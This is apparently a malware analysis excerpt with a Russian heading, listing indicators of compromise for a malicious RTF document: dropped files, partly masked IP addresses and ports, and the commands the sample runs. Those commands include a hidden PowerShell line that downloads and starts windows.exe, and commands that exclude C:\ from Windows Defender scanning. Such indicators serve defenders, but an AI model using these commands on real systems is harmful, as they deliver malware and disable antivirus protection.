Техническая информация
- http://13.##.179.221/windows/windows.exe как %appdata%\windows.exe
- %WINDIR%\syswow64\cmd.exe
- %TEMP%\abctfhghgdghgh‹.sct
- %APPDATA%\windows.exe
- <Текущая директория>\~wrd0000.tmp
- %TEMP%\abctfhghgdghgh‹.sct
- <PATH_SAMPLE>.rtf
- '13.##.179.221':80
- '13#.#16.87.64':8400
- '13#.#16.87.64':8400
- '%APPDATA%\windows.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://13.##.179.221/windows/windows.exe','%APPDATA%\windows.exe');Start-Proc...' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\
- '%WINDIR%\syswow64\cmd.exe'